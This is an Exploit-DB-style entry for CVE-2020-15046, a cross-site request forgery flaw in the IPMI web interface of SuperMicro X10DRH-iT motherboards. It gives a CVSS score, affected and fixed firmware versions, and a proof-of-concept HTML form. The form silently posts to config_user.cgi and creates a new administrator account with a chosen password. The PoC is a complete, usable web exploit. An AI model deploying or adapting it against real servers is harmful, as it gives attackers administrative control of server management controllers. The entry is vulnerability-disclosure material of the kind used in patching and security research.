SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)

vendor:

Unknown

by:

Metin Yunus Kandemir

8.8

CVSS

HIGH

Cross-Site Request Forgery

Unknown

CWE

Product Name: Unknown

Affected Version From: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2020-15046

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

2020

SuperMicro IPMI WebInterface 03.40 – Cross-Site Request Forgery (Add Admin)

The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40 allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.

Mitigation:

The fixed versions are BIOS 3.2 and firmware 03.88.

Source

Exploit-DB raw data:

# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Date: 2020-07-15
# Vendor Homepage: https://www.supermicro.com/
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery

# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
# The fixed versions are BIOS 3.2 and firmware 03.88.

# PoC :

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
<input type="hidden" name="username" value="JOKER" />
<input type="hidden" name="original&#95;username" value="2" />
<input type="hidden" name="password" value="onebadday" />
<input type="hidden" name="new&#95;privilege" value="4" />
<input type="submit" value="submit request" />
</form>
</body>
</html>